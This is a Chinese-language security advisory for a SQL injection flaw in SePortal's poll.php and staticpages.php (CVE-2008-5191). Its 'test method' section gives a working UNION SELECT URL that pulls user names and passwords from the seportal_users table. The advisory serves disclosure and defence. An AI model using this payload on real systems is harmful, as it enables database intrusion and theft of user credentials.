SePortal \'poll.php\' SQL注入漏洞
发表日期:2014-11-26 16:41:09
SePortal \'poll.php\' SQL注入漏洞
BugTraq-ID:29996
CVE-ID:CVE-2008-5191
发布日期:2008-06-28
更新日期:2008-06-28
受影响系统:
seportal seportal 2.5
详细信息:
SePortal是网络日志系统。 SePortal 2.4及其他版本在实现上存在SQL注入漏洞,远程攻击者通过发送构造的SQL语句到poll.php或staticpages.php脚本(带poll_id或sp_id参数),利用此漏洞可在后端数据库中执行未授权操作。
来源:
Mr.SQL
参考信息:
http://xforce.iss.net/xforce/xfdb/43450
测试方法:
警告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/poll.php?poll_id=1\'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*
解决办法:
厂商补丁:
seportal
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.seportal.org/